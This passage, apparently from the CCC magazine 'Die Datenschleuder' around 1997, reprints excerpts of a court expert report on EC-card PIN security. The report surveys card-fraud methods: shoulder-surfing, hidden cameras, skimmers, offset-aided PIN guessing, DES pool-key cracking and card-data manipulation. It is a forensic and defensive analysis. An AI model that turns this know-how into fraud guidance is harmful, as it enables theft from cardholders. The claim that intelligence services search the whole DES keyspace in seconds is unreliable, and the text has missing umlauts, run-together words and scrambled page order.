neben der ffentlichen Beleuchtung der EC-Kartenproblematik natrlich auch darum,auch dem letzten DAU klarzumachen, dader 56bit-DES unsicher ist; denn die Geheim-dienste haben lngst Maschinen um denkompletten 56bit-Keyspace in weniger als 10Sekunden durchzurechnen und so trotzBrute-Force effektiv zu arbeiten. Der BNDetwa betreibt zwei solcher Rechner (ThinkingMachine Corporation). Im Grunde wirft dieFreigabe von 128bit-Schlsseln (IDEA) durchdie Amerikaner (siehe Meldung in dieser DS)schon ganz andere Fragen bezglich geheim-dienstlicher Aktivitten auf.In Vorgesprchen mit entsprechenden Stellenhaben wir bereits Kooperationsbereitschaftzugesichert bekommen. Fr konkreteAquisearbeit sollte natrlich das technischeRealisierungskonzept stehen.

Denkbar ist technisch auch die Realisierungdes von Michael J. Wiener bereits 1993

beschriebenen Efcient DES Key SearchMaschinchens. Die Diskussion ist hiermiterffnet. Fr Anregung, technische Hinweise

und sonstige Form der Mitarbeit sind wirdankbar.Andy Mller-Maguhn, [email protected]

(1) siehe Diskussion in de.org.ccc(2) ist in der Newsgroup de.org.ccc bzw. kann bei mirper mail angefordert werden

(3) ala Card Ausgabe 20-21/1997 Seite 254d: [...] ver-einbart, da uerungen zu diesem Thema nur vomZentralen Kreditausschu kommen [...].

(4) das ZKA faxte uns trotz telefonischer Zusage dieStellungnahme nicht zu, daher Zitate ebenfallsentnommen aus der ala Card Ausgabe 20-21/1997


13/32

4.4.3 Komponente: Magnetstreifenkarte

4.4.3.1 Produktionsfehler4.4.3.2 Kartendaten

4.4.3.3. Verknpfte Sicherheit/MM

4.4.3.4. Persnliche Geheimzahl/PIN

4.5 Methoden

4.5.1 Aussphung

4.5.1.1 Passive Aussphung

4.5.1.2 Aktive Aussphung

4.5.2 Ermittlung4.5.2.1 Durch Abfangen

4.5.2.2 Empirische Ermittlung per PIN

4.5.2.3 Die mathematische Ermittlung

4.5.2.4 Die elektronische Ermittlung

4.5.3 Manipulation

5. Zusammenfassung der Risikoanalyse

6. Beantwortung der Beweisfragen

7. Erklrung des Sachverstndigen

1. Auftrag

...

Der relevante Teil des Beweisbeschlusses lau-tet:

a) Unter welchen Voraussetzungen und mitwelchem zeitlichen Aufwand lt sich diePIN einer gestohlenen ec-Karte von einemTter ermitteln?

b) Ist es dabei denkbar, da ein Tter dieseinnerhalb von 30 Minuten herausndet, gege-

benfalls mit Hilfe von Erkenntnissen auseinschlgigen Vortaten, um welcheVorkenntnisse mte es sich dabei handeln?`

...

Gutachten 94 22 / 03

vom 25. Februar 1997

Begutachtung der Sicherheit einer EC-CARD

Im Rechtsstreit < > / Deutsche Postbank AG

vor dem Oberlandesgericht Hamm

Az.: 31 U 72 / 96

Gutachter:

Prof. Dr. Dipl.-Ing. Manfred Pauschvon der Industrie- und Handelskammer Darmstadtffentlich bestellter und vereidigter Sachverstndigerfr Informationsverarbeitung im aufmnnischen undadministrativen Bereich (Kleinrechner-Systeme)

Inhaltsverzeichnis

1. Auftrag

2. Beweislage

3. Ausgangslage

4. Risikoanalyse4.1 Personen-Kategorien

4.1.1 Mitarbeiter

4.1.2 Vertragspersonal

4.1.3. Systemberechtigte Teilnehmer

4.1.4 Systemfremde Teilnehmer

4.2 Zahlungssystem

4.3 Komponenten

4.4 Risiken

4.4.1 Komponente: GAA/POS-Terminal

4.4.1.1 Konstruktive Mngel

4.4.1.2 Aufstellungsort

4.4.1.3 berwachung

4.4.1.4 Automatenraub

4.4.2 Programme und Netze

4.4.2.1 Verrat und Korruption

4.4.2.2 Programmfehler

4.4.2.3 Netzsicherheit

Die Datenschleuder


Gutachten 9422/ 03


14/32

Wahrscheinlichkeit die richtige PIN zufllig

einzugeben, falsch. Tatschlich gibt es bei ec-Karten nur die Zahlen von 1000 bis 9999. Beidrei Versuchen ergbe sich damit ausLaiensicht eine Wahrscheinlichkeit von1:3000. Wenn man jedoch wei, da bestimm-te Ziffern in der PIN huger vorkommen alsandere, so erhht sich die Wahrscheinlichkeitauf 1:682 (1). Ein Experte, der auch noch dieauf der Karte bendlichen Offsets bercksich-tigt, bringt es sogar auf ca. 1:150 (2). Da dieDIN/ISO 4909, die die Organisation derwichtigen Spur 3 auf ec-Karten beschreibt,

jedermann zugnglich ist und auch in einerHackerzeitung (3) verffentlicht wurde, mudieses Fachwissen auch einschlgigenTterkreisen unterstellt werden.

Die ungesicherte Erkenntnislage in diesemFall erzwingt deshalb zuerst eineRisikoanalyse des automatisiertenZahlungssystems, damit das Gericht einenberblick ber die vielfltigen Methoden desKartenmibrauchs gewinnen und diesegewichten kann, bevor die Beweisfragen imeinzelnen beantworten werden knnen.

Die Darstellung der komplexenZusammenhnge soll anhand desdargestellten Schaubildes erfolgen.

4. Risikoanalyse

Fr alle kryptographischen Verfahren mugelten, da ihre Sicherheit nur auf derGeheimhaltung der verwendeten Schlssel

beruhen darf, nicht aber auf derGeheimhaltung der angewandten Verfahren.Eine Geheimhaltung der Verfahrenimplementiert, da Auenstehende dieSicherheit des Systems durchbrechen knnen,also reale Sicherheitslcken.Die Kryptologie als Spezialgebiet derMathematik / Informatik wird im Hinblickauf Sicherheit und Vertrauenswrdigkeit derautomatisierten Systeme in unserer fortschrei-tenden Informationsgesellschaft einsteigender Stellenwert zukommen. Ihre Rollemu deshalb der ffentlichen und politischenDiskussion unterworfen werden.

Die Verantwortung fr die Sicherheit desheutigen automatisierten Zahlungssystems

obliegt der Kreditwirtschaft. Sie hat den

Die Datenschleuder



3. Ausgangslage

Mit der Magnetkarte fehlt ein extremwichtiges Beweismittel, das einSachverstndiger einer umfangreichen, u.U.prozeentscheidenden, forensischerUntersuchung unterziehen kann. ... Durch diederzeitige Unmglichkeit einer Begutachtungder streitbefangenen Magnetkarte kann nicht

bewiesen werden, ob die Kartendatenmanipuliert worden sind.

Insbesondere kann nicht festgestellt werden,ob der Fehlbedienungszhler zurckgesetztworden ist. Es gibt also keine gesichertenErkenntnisse fr die Behauptung derBeklagten, da der Tter beim ersten Versuch

bereits die richtige PIN eingegeben hat. Es istsehr wohl denkbar, da auch an anderenAutomaten bereits Versuche unternommenwurden, die bisher nicht zur Kenntnis desGerichts gebracht worden sind.

Nach Aktenlage ist auch nicht zu erkennen,ob berhaupt eine Prfung der PIN amGeldausgabeautomaten vorgenommenworden ist. Die vorgelegten Buchungsbelege

zum Konto des Klgers sind dazu nichtgeeignet. (Auf dieser Grundlage allein knnteauch eine simple Fehlbuchung bei derBeklagten durch falsche Kontozuordnungnicht ausgeschlossen werden.) Hierber kannnur das Transaktionsprotokoll, das denVerkehr zwischen dem Automaten und demRechenzentrum aufzeichnet, in Verbindungmit dem Kontrollstreifen des AutomatenAuskunft geben. Diese Dokumente liegen derAkte aber nicht bei.

Es ist also gar nicht sicher, da der Automat

zum Zeitpunkt der streitgegenstndlichenAbhebung online, d.h. mit demRechenzentrum in Verbindung war. Auch istnicht ersichtlich, ob eine MM-Prfungvorgenommen worden ist. Es knnte auch einHardware- oder Software-Fehler vorgelegenhaben. Hierber kann nur die Auswertungder Dokumente durch einenSachverstndigen Auskunft geben.

Die von der Beklagten vorgelegten Gutachter

der Gutachter Haverkamp und Dr. Heuser(BI. 66 und 157 d.A.) sind bezglich der


15/32

zentralen Sicherheitsbereich

Schlsselmanagement nach dem durch denStand der Technik vorgebenen Standard zuorganisieren. Dieser Bereich desSicherheitsrisikos wird in der nachfolgendenRisikoanalyse des automatisiertenZahlungssystems nicht bercksichtigt. DieUntersuchung konzentriert sich vielmehr aufden durch die Einwirkung durch Dritte

begrenzten Hard- und Softwarebereich, weildie sogenannten Phantomabhebungen inder Mehrzahl hiermit erklrt werden knnen.(Solange die genauen Methoden der

behaupteten unberechtigten Kontenzugriffenicht eindeutig feststehen, hat es sich in derFachliteratur eingebrgert, vonPhantomabhebungen zu sprechen.)

Bei der Beschreibung der im Schaubild darge-stellten Elemente ... folgt der Sachverstndigeder dort verwendeten Bezeichnung undOrdnung. ...

4.4.3.4 Persnliche Geheimzahl PIN

Es werden verschiedene Verfahren zurGenerierung einer PIN angewandt (16). Frdie Abschtzung des Sicherheitsrisikos kannman sich jedoch auf den Kern, das allseitsverwendete DES-Verschlsselungsverfahren,

beschrnken.

Dieses soll durch das Fludiagramm auf derfolgenden Seite veranschaulicht werden.Darin ist zur besseren Verstndlichkeit die iminstitutsinternen Verfahren benutzte PIN alsnatrliche, die im institutsbergreifendenVerfahren benutzte PIN als endgltige PIN

bezeichnet.

4.5. Methoden

Grundstzlich gilt: Was verschlsselt werdenkann, kann auch wieder entschlsseltwerden. Die Methode, wie man zu einer PINkommt, die zu einer fremden Magnetkartegehrt, ist nur eine Frage des Aufwandes,also der Zeit, der Kosten und dervorhandenen Ressourcen.

4.5.1 Aussphung

4.5.1.1. Passive Aussphung

Die Datenschleuder


Gutachten 9422/ 03

Die Aussphung ist die mit Abstand

verbreitetste Methode, an eine fremde PIN zukommen. Es kann an Geldausgabeautomaten,besonders in verkehrsreichen Zonen, oderPOS-Systemen in Kaufhusern undTankstellen hug beobachtet werden, dasich Dritte im unmittelbaren Einsichtsbereichder Tastatur aufhalten und so die PIN ohneweitere Hilfsmittel optisch erkennen knnen(Pfad 5.1 - 5.1.1. - 5.1.3. - 5.1.5). Diekonstruktiven Merkmale fast aller inGebrauch bendlicher GAA untersttzen die-se Methode in nahezu stricher Weise.Abhilfe ist mit einfachsten Mitteln sehrwirksam zu schaffen. Hug fehlt demlegalen Bediener des GAA aber auch dasBewutsein fr eine mgliche Aussphung,sei es da der/die Dritte Freund/Freundinoder Verwandter/Verwandte ist, denensolche Absicht nicht unterstellt wird, oder seies, da er (besonders ltere Leute) dieMglichkeit des Aussphens unterschtzt.Fr diese Methode gibt es in der praktischenErfahrung des Autors als Sachverstndigereine Vielzahl von Beispielen, die aber hierwegen ihre Offenkundigkeit nicht einzeln

vorgestellt werden sollen.Trotzdem mssen die Erfolgschancen der ein-fachen optischen Aussphung untersuchtwerden. Wenn bei einem Touchscreen-GAAvier Abdrcke ohne Reihenfolge der Eingabezu erkennen sind, so wird durchsystematisches Ausprobieren sptestens im24. Versuch die richtige PIN ermittelt.Statistisch gesehen betrgt die Chance 1:12.Bei drei zulssigen Eingabeversuchen wrdeauf diese Weise fr jede vierte (gestohlene)Karte die richtige PIN eingegeben werden

knnen. Eine wahrlich gute Trefferquote!4.5.1.2. Aktive Aussphung

Aus Norwegen, Schweden und England sindFlle (17) bekannt, in denen kriminelleVereinigungen Wohnungen gegenber vonGAA in verkehrsreichen Zonen angemietethatten. Von dort sphten sie mit Fernglsern

bzw. Kameras mit Teleobjektiven PIN aus(Pfad 5.1 - 5.1.2 - 5.1.4 - 5.1.5). Die Bedienerwurden anschlieend geziehlt bestohlen bzw.

beraubt und ihre Konten geplndert.


16/32

mit dem Ergebnis der DES-Algorithmus-

Rechnung zu vergleichen.Bei institutsbergreifender Nutzung istfolgender Rechenvorgang anzuwenden:

Eingetastete persnliche Geheimzahl desKunden

- Ergebnis des DES-Algorithmus mitPoolschlssel

= jeweils gltiger Offset

oder

Ergebnis des DES-Algorithmus mitPoolschlssel

+ jeweils gltiger Offset

= vom Kunden eingetastete persnlicheGeheimzahl

Einer dieser Poolschlssel ist in einemHardware-Sicherheits-Modul (HSM) imGeldausgabeautomaten gespeichert. Bei derOFFLINE-Prfung verschlsselt der

GAA die Kartendaten mit dem Poolschlssel.Wenn das Ergebnis zusammen mit demPoolschlssel der vom Kunden eingebenenPIN entspricht, wird die Eingabe vom GAAakzeptiert.

Wie gro ist die Chance, die PIN zu erraten?Dazu mu man wissen, da es bei der PINnur 9000 Mglichkeiten gibt. Unterstellt man3 Versuche, bevor die Karte bei falscher PIN-Eingabe einbehalten wird, so ergibt sich inerster (laienhafter) Nherung eineWahrscheinlichkeit von 1:3000 = 0,00033.Statistisch korrekt ergibt sich fr das Erraten

der PIN in drei Versuche unterBercksichtigung der Entropie jedoch eineWahrscheinlichkeit von 0,00044.

Wenn, z.B. durch Aussphung, bereits Teileder PIN bekannt sind, erhht sich dieWahrscheinlichkeit naturgementsprechend. Dabei kommt es aber daraufan, ob die erste und/oder eine dernachfolgenden Stellen der PIN bekannt sind.Denn in der PIN kommen nicht alle Zifferngleich hug vor. Bestimmte Ziffern knnen

z.B. nicht in der ersten Stelle der PINvorkommen.

Die Datenschleuder



Eine auch in Deutschland verbreitete Variante

dieser Methode ist das Anbringen von Mini-Videokameras (18) (54*54*34 mm), die dieBilder per Funk ber eine Strecke bis zu 400mbertragen. Die entsprechende betriebsfertigeAusrstung (Minikamera und Monitor) ist imElektronikhandel - natrlich nicht fr diesenZweck - fr weniger als 1.000,- DM erhltlich(Anlage 2).

In einem anderen Fall benutzte in einer west-deutschen Grostadt ein Elektronik-Freakselbstgebaute Vorsatzgerte, die ernacheinander an verschiedene GAA anbrach-

te, und bertrug per Funk smtliche Datender Karten einschlielich zugehriger PIN

in seine Computer-Datenbank (19).Anschlieend plnderte er die Konten. DenKunden sind die Vorsatzgerte nicht aufgefal-len.

...

4.5.2.2 Empirische Ermittlung der PIN

Entgegen anderslautenden Behauptungen derKreditwirtschaft werden auch heute

(beweisbar) noch Geldausgabeautomatenhug ofine betrieben. Das mu auch alleinschon wegen der Wartungszeiten technischerEinrichtungen und zur Aufrechterhaltung desBetriebes bei Strungen der Fall sein. Beimofine-Verfahren wird ein Poolschlsseleingesetzt. Die Kartendaten sind deshalb beider Herstellung mit mehreren verschiedenenSchlsseln verschlsselt worden.

Die zugehrigen Offsets sind auf der Karteabgespeichert und knnen ausgelesenwerden.

Im deutschen ec-Geldautomatensystemwerden maximal 2 Schlssel vorrtiggehalten und wahlweise eingesetzt (21):

- Der Institutsschlssel, der zur Ermittlungund Prfung der persnlichen Geheimzahlder eigenen Kunden des Institutsherangezogen wird, das den ec-GA betreibt.

- Der Poolschlssel, der zur Ermittlung undPrfung der persnlichen Geheimzahl alleranderen Benutzer dient.

Bei institutsinterner Nutzung ist die vomKunden eingetastete persnliche Geheimzahl


17/32

Schlssellnge aufmerksam gemacht. Die

aktuellere Schtzung dieser Wissenschaftlervom Januar 1996 ist nachstehend wiedergege-ben (24):

Nach heutigem Stand knnten selbst bei der10.000 $-Variante ASICS eingesetzt werden,ohne da sich die Kosten wesentlich erhhen.Unter dieser Vorraussetzung knnte dieSchlsselsuche in ca. 14 Tagen durchgefhrtwerden. (Falls die Spezialmaschine selbst ent-wickelt werden mu, gilt: Bei allen Variantenmssen noch die Entwicklungskosten inHhe von ca. 500.000 $ bercksichtigt

werden. Diese wurden bei Erstellung derTabelle von den Autoren offensichtlichvergessen.)

Da die Schlsselsuche mit der Wiener-Maschine nur ein einziges Mal fr jedenSchlssel durchgefhrt werden mu, ist dieVerarbeitungsgeschwindigkeit im Grunde beider Risikobetrachtung von nachgeordneterBedeutung. Der Tter mu auch nichtselbst die Schlsselsuche durchfhren . Es istherauszustellen, da die Schlsselsuche mitder Wiener-Maschine von anderen Personen,zu anderer Zeit und an anderem Ort durchge-fhrt werden kann. Wenn also einPoolschlssel mit der Wiener-Maschine in 14Tagen geknackt werden kann, so ist das beidiesen Investitionen ein lukratives Geschft.Denn die gefundenen Schlssel knnen anInteressierte verkauft werden, die dann mitkleinen Laptop-Computern in Sekunden dierichten PIN zu gestohlenen ec-Kartenerrechnen knnen. Bei dezenter Anwendung,die eine Entdeckung unwahrscheinlichmacht, bersteigt der Ertrag dieInvestition um ein Vielfaches.Es sei auerdem noch angemerkt, da dieKosten fr FPGAs und ASICs trotz des zurZeit hheren Dollarkurses seit der Erstellungder vorherstehenden Tabelle erheblich gesun-ken sind. Auch mu auf die PC-gesttzteZeit- und Kostenrechnung im Amateurbereichaufmerksam gemacht werden, die das Poten-tial der Tter nur auf dieser Basis vergleich-

bar machen kann. Das entspricht aber nichtden Gegebenheiten in Deutschland. Mit

leistungsfhigeren Rechnern (z.B. gebrauch-ten Grorechnern, die wegen der galop-

In Wirklichkeit ist die Chance dadurch grer

als der Laie vermutet, da manche Zahlen inder PIN huger vorkommen als andere. Mitdiesem Wissen betrgt die Chance, dierichtige PIN zu erraten, 1:682 = 0,00147. Mitdem Expertenwissen ber die Offsets kanndie Wahrscheinlichkeit sogar auf ca. 1:150 =0,00667 erhht werden.

4.5.2.3 Die mathematische Ermittlung der PIN

Die Kreditwirtschaft sttzt ihre Aussagebezglich der Sicherheit hug auf densogenannten Brute Force Attack und leitetdaraus den Zeitbedarf fr die Ermittlung desSchlssels von derzeit 1900 Jahren (22) PC-Rechenzeit ab.

Mit diesem Ansatz kann durchNachvollziehen der Verschlsselung der voll-stndige Schlssel eines kartenausgebendenInstitutes mit allen 56 wirksamen Stellenermittelt werden. Das erfordert natrlichselbst bei grozgigsten Ressourcen aufeinem PC immens viel Zeit.

Es sind auch spezielle Gerte undSchaltungen verffentlicht worden, mit denen

die Berechnung schneller erfolgt. Einedetaillierte Konstruktionsbeschreibung einersolchen Maschine hat der kanadischeKryptologe Michael J. Wiener von BellNorthern Research bereits 1993 vorgestellt(23). Da fr Kredit- und Bankkarten weltweitnahezu die selben Verschlsselungsverfahrenangewandt werden, kann die Wiener-Maschine auch sozusagen universelleingesetzt werden.

In Anbetracht dieser technischenEntwicklung kommt den bereits seitEinfhrung des DES-Verfahrensvorgetragenen Bedenken ber eineausreichende Schlssellnge wachsendeBedeutung zu. Die Schlssellnge von 56 bit

beruht nicht nur auf der damaligen Kapazittder eingesetzten ICs, sondern ist nicht zuletzt darauf zurckzufhren, da dieamerikanischen Sicherheitsbehrden in derLage bleiben wollten, den mit dieserSchlssellnge codierten Datenverkehr leichtentschlsseln zu knnen.

Fhrende amerikanische Kryptologen habenbereits 1993 auf die unzureichende

Die Datenschleuder


Gutachten 9422/ 03


18/32

Deutschland kann diese Mglichkeit nicht

ausgeschlossen werden. ErnstzunehmendeInformationen aus der Szene deuten daraufhin.

4.5.3 Manipulation

Manipulationen der auf der Magnetkarteabgespeicherten Daten zur Herstellung einesZustandes, mit dem die Akzeptanz einer

bestimmten oder aller PIN-Eingaben erreichtwerden sollen, lassen sich in der Mehrzahldurch forensische Untersuchungen der verur-sachenden Karte nachweisen (Pfad 5.3 - 5.3.1+ 5.3.2). Das hat der Sachverstndige inmehreren Fllen bewiesen. Die blicheVernichtung der Magnetkarte durch dasausgebende Kreditinstitut ist deshalb als wei-teres Risiko zu erwhnen. Das einfacheZerschneiden der Karte vernichtet nicht inallen Fllen die Daten, so da ein Fachmannhug noch Auswertungen vornehmen kann.

Es sind aber auch Flle bekannt (27), in denendie Betrger Vernderungen an denKartendaten vorgenommen haben, um

beispielsweise den Fehlbedienungszhler

zurckzusetzen, den Verfgungsrahmen zuvergrern oder die Gltigkeit zu erreichen.Auch das lt sich in der Regel anhand dereingezogenen Karte durch forensischeUntersuchungen nachweisen.

Darber hinaus sind viele Kombinationen dervorgestellten Methoden denk- und machbar.Auf die Entkoppelung von Zeit und Raum

bei der Aussphung mu besondershingewiesen werden, weil hierdurch dieAufklrung extrem erschwert wird.

Beispiel: Wenn ein Kunde bei der Eingabe sei-ner PIN in einer Tankstelle unbemerkt ausge-spht wird, so kann seine Identitt vom Tterin der Regel ber das KFZ-Kennzeichen oderdie Verfolgung seines Fahrzeugs festgestelltwerden. Es wurde berichtet, da dannAuftragsdiebe oder Auftragsruber nach eini-gen Tagen dem Auftraggeber (Ausspher) dieMagnetkarten beschafft haben, der dann dasKonto der Betroffenen ausplnderte. DerBetroffene wird sich in der Regel nicht mehran die Mglichkeit einer Aussphung in derTankstelle oder gar an den Tter errinern.

...

Die Datenschleuder



pierenden technischen Innovation dieser

Systeme nahezu verramscht werden) lassensich Kosten und Zeiten dramatisch senken.

Weil ein Dieb aber nur an der vierstelligenPIN interessiert ist, wird der Einzeltter inder Praxis die Investition scheuen. Es ist

jedoch durchaus vorstellbar, da sich interna-tionale Organisationen dieser Methode bedie-nen knnten, um alle PIN zu knacken.

Der Smart Attack (25) basiert mehr aufpragmatischer Methodik und nutzt allemathematischen Einschrnkungen und

Erleichterungen der realen Gegebenheiten(z.B. die Wertepaare sind nur fr wenigePunkte mathematisch deniert und die realeWerteche ist nur eine geringe Untermengeder mathematischen Gesamtmenge) sowiedas spezielle Verfahrens-Design zur Ermitt-lung vierstelligen PIN aus. Wie schon darge-legt erhht sich durch Einbeziehung der aufder Karte abgespeicherten Offsets die Chancefr den Experten, bei zufllig gewhltenKarten, bereits auf 1:150. Die Chancen ver-grern sich in der Praxis noch, weil derPoolschlssel seit langer Zeit nicht verndertwurde. Der Autor konnte im praktischenVersuch fr ein Amtsgericht die gesuchterichtige PIN bereits im 17. Versuch mittelsErhhung der Ordnung einer Spline-Funktionermitteln.

4.5.2.4 Elektronische Ermittlung der PIN

Das elektronische Abfangen von Datenwurde bereits unter Punkt 4.2.3(Netzsicherheit) errtert. An dieser Stelle solldeshalb auf die Ermittlung der PIN unterVerwendung von Originalteilen aus GAA ein-

gegangen werden.Aufgrund der Ofine-Struktur des deutschenGAA-Systems sind die Mglichkeiten derErrechnung und Prfung der PIN im GAAeingebaut. Aus Skandinavien ist ein Fall

bekannt (26), in dem diese Komponenten mitder GAA entwendet wurden. Die Diebe, dieber entsprechende Elektronik-Kenntnisseverfgten, bauten daraus ein Gert, das beigegeben Kartendaten blitzschnell alle PIN-Nummern abfragte, bis die richtige gefunden

war. So konnte die unbekannte PIN inSekunden ermittelt werden. Auch in


19/32

das der Benutzer zu tragen hat oder ob das

Risiko nach dem Stand der Technik mitvertretbarem Aufwand verringert werdenkann. Der Sachverstndige ist derAuffassung, da das Risiko durch einfachsteManahmen drastisch reduziert werdenkann, z.B. durch Sichtschutz zurErschwerung der Aussphung

...

Es ist auch wichtig, die Zugangsmglichkeitzu den beschrieben Verfahren abzuwgen.Das heit, wie hoch sind die Investitionenund ber welche Qualikationen men dieTter verfgen? Nur nach Beantwortungdieser Fragen lt sich entscheiden, ob man

bei jedem in der Kriminalstatistikaufgefhrten Kartenmibrauchsfall dieVortuschung einer Straftat annehmen mu.

Bereits fr 49,50 DM bietet in bekannterElektronik-Handel Codierstationen aus DDR-Bestnden (Anlage 3).Mit diesen(fabrikneuen)Gerten knnen Magnetkarten hergestellt,dupliziert, manipuliert und gelesen werden.Die zugehrige Software ist als ausfhrlichesListing in einer Elektronikzeitschriftverffentlicht worden (Bl 24 ff d.A.) Was jedeStelle der Magnetspur einer ec-Karte

bedeutet, kann man in einer Hackerzeitungnachlesen (Bl. 19 d.A. sowie Anlage 4), wennman nicht Zugang zu einer DIN/ISO 4909hat.

ber die notwendigen Eingangsqualikatio-nen verfgen mindestens alle Computer-Freaks, Technik- und Informatikstudenten.Die Vorleistungsinvestitionen scheinennicht unberwindlich. Man darf deshalb einausreichendes Tterpotential vermuten.

6. Beantwortung der Beweisfragen

Es wurde in der Analyse mehrereMglichkeiten aufgezeigt, wie unberechtigteTter in krzester Zeit Kenntnis einer PINerlangen knnen. Das Gericht mge

bewerten, ob eine der vorgestellten Methodenin diesem Rechtsstreit mit berzeugenderWahrscheinlichkeit angewandt worden seinkann. Wegen der Unmglichkeit einerforensischen Untersuchung der Magnetkarteknnen durch den Sachverstndigen nur die

unter den gesicherten Umstnden technisch

Es ist auch naheliegend, da die Ende 1995 in

den Niederlanden von Unbekannten mitKartenkopien gettigten Abhebungenzulasten Banken in Jlich und Hckelhoven(28), auf die gleichzeitige Anwendung mehre-rer der vorgestellen Methoden zurckgefhrtwerden kann. Es kann nicht ausgeschlossenwerden, da hier die PIN von ca. 100 Kundenmittels einer Minivideokamera unbemerktausgespht und die Kartendaten mit einemelektronischen Vorschaltgert erfat wordensind. In diesem Fall beluft sich dieSchadenssumme auf ca. 300.000,- DM. InAnbetracht der besonderen Umstnde habendie Banken allerdings die Kundenentschdigt.

5. Zusammenfassung der Risikoanalyse

Vorstehend weurde eine systematischeRisikobetrachtung fr den automatisiertenZahlungsverkehr mit Magnetkartenvorgestellt. Die Quantizierung deraufgezeigten Risiken kann nicht verbindlichvorgenommen werden. Dunkelziffern sindnicht bekannt. Gemessen an der Zahl der inder Kriminalstatistik (29) dokumentierten

Flle beinhaltet die Sammlung desSachverstndigen nur eine uerst geringeMenge. Diese wird allerdings durch laufendeErfassung stndig aktualisiert.

...

Einige der vorgestellen Methoden sind soerfolgreich, da entgegengehalten werdenkann, wenn diese Verfahren tatschlich in derPraxis angewandt wrde, htte es einen nichtzu bersehenden Effekt hervorgerufen.Dieser sei aber bisher nicht erkennbar.

Tatschlich erhebt sich aber hier die Fragenach dem intellektuellen Potential der Tter.In Anbetracht der schwerwiegenden Materiekann es ein gefhrlicher Trugschlu sein,wenn die Gentleman-Tter auf das Niveauherkmmlicher Geldschrankknacker des Ede-Typs reduziert werden.

...

Es lt sich auch beim automatisiertenZahlungssystem, wie bei jedem anderen tech-nischen System, nicht leugnen, da es

risikobehaftet ist. Die Frage ist nur, ob es sichum das unvermeidbare Restrisiko handlet,

Die Datenschleuder


Gutachten 9422/ 03


20/32

Tatumstnde von allen bekannten Varianten

die hchste Wahrscheinlichkeit zuunterstellen.

zu 2:

Die Magnetkarte der Klgers kann auch mitProduktionsfehlern behaftet gewesen sein,die die Eingabe einer beliebigen PINerlauben. Ein solches Verhalten ist inmehreren aufgetretenen Fllen dokumentiert,so da es auch in diesem Fall nichtausgeschlossen werden kann. Es ist fr dieBeurteilung von hypothetischem Wert, ob dasVerhalten als Karten- oder Programmfehlerangesehen wird. Darber hinaus knnen dieentwendete ec-Karte des Klgers auch vondem Tter mit diesem Ziel verndert wordensein. Da die Karte aber nicht forensisch unter-sucht werden kann, bleiben alle AussagenVermutungen.

Weil aber auch keine Transaktionsprotokolleund Protokollstreifen der GAA / POSvorgelegt wurden, lt sich nicht feststellen,ob die PIN berhaupt im Rahmen derunberechtigten Abhebungen geprft worden

ist.Wegen der derzeit nicht mglichenAuswertung der entwendeten ec-Karte desKlgers kann auch nicht ber die Historie derVerwendung dieser Karte festgestellt werden.

zu 3:

Selbst wenn zur Tatzeit ein Programmfehlerin der Systemsoftware der Beklagten nichtvorhanden war, lt sich dieser heute nichtmehr feststellen, weil die Beklagte nach derErfahrung des Sachverstndigen auch

gerichtsbeauftragten Externen kategorisch dieInformation hierber verweigert.

Die Frage nach der Betriebsart desZahlungssystems der Beklagten zumTatzeitpunkt kann der Sachverstndigederzeit nicht beantworten, weil dievorgelegten Kontoauszge hierber nichtaussagen. Erst nach Prfung der relevantenTransaktionsprotokolle und derKontrollstreifen der betroffenen GAA undPOS knnen hierzu gutachterlicheFeststellungen getroffen werden.

Frage:

Die Datenschleuder



unmglichen Methoden ausgesondert

werden. Bei den briggebliebenen kann derSachverstndige weder eine Mglichkeitausschlieen noch beweisen.

Frage:

a) Unter welchen Vorraussetzungen und mitwelchem zeitlichen Aufwand lt sich diePIN einer gestohlenen ec-Karte von einemTter ermitteln?

Antwort:

Da der Klger angibt, seinen PIN-Brief sofortnach Empfang vernichtet zu haben und auchdie PIN inzwischen vergessen und niemalseinen Geldausgabeautomaten benutzt zuhaben, scheiden alle Mglichkeiten einerAussphung aus.

Denkbar bleiben somit die Mglichkeiteneiner Ermittlung der PIN (1), einerManipulation der Magnetkarte (2) oder einesSystemfehlers (3) in Form einesProgrammfehlers (Betriebssystem) bzw.aufgrund der Betriebsart (online/ofine).

zu 1:

Wegen der langen Zeit seit Versendung desPIN-Briefes an den Klger ist Mglichkeit desAbfangens dieses Briefes auf dem Postwegnahezu ausschlieen.

Bei der empirischen Ermittlung der PINdurch Ausprobieren ist die hchsteErfolgswahrscheinlichkeit mit 1:150 anzuneh-men.

Wie im Rahmen der Risikoanalyse dargelegt,ist die Wahrscheinlichkeit einer rechnerischenErmittlung der PIN nach der Methode Brute

Force Attack oder Smart Attack geringer.Es kann aber nicht mit letzter Sicherheitausgeschlossen werden, da es noch andere,effektivere rechnerischer Methoden zurErmittlung der PIN gibt, von denen derSachverstndige zur Zeit noch keine Kentnishat.

Setzt man vorraus, da auchSystemkomponenten aus einem (geraubten)GAA verwendet worden sein knnten, so istdie schnelle und richtige Ermittlung der PINzur Karte des Klgers nicht von der Hand zu

weisen. Dieser Methode ist in Anbetracht der


21/32

(25) Manfred Pausch: Gutachten fr AG Darmstadt 38

C 4386/87, 10.07.1988(26) Ivar Kamsvag: Slik kan en minibank knekkes

Computerworld Norge, 1/1993 S. 4-5, 15.01.1993

(27) NDR Ratgeber Technik: Archiv Ammann,

Lehnhardt, Leptihn

(28) Westdeutsche Allgemeine Zeitung: Geldautomat

kopiert den Magnetstreifen, 12.01.1996

(29) Bundeskriminalamt, Kriminalistisches Institut,

Ref. Kl 12: Computerkriminalitt 1995 in der

polizeilichen Kriminalstatistik (PKS):

Gesamtdeutschland.Anmerkungen der Redaktion:

- Eingabe des PIN-Codes auf Touchscreen bei GAA:

z.B. Citibank (Quelle: Pausch bei Vortrag in Hamburg

auf dem ala Card-Forum)

- Ofine-Zeiten der GAA sind z.B. auch durch

Umbuchung der technischen auf die juristischen

Datenbestnde bedingt, wie etwa bei der Deutschen

Bank zwischen 22 und 7 Uhr (Batchbetrieb, auch kein

Zugriff auf Kontostandsdrucker) (Quelle: Kunden-

Beobachtung ++)

- Hardware-Sicherheits-Modul : gemeint ist z.B. derDALLAS DS5002FP, ein Hochsicherheits-

Microkontroller mit BUS-Verschlsselung, der von

Markus Kuhn vollstndig geknackt wurde. Befehlssatz

ist 8031 kompatibel. (Quelle: Nachricht in de.org.ccc

von Michael Holztl, [email protected])

- die Hinweise auf auf die Entwendung eines solchen

Moduls und dem kriminellen Einsatz in der BRD

(Pausch in Hamburg: Region Berlin) entstammen

Christian Zimmermanns Buch Der Hacker, das

bezglich seiner Informationsgte als oberchlichund undifferenziert und teilweise sachlich falsch zu

bezeichnen ist. Der Autor Christian Zimmermann ist

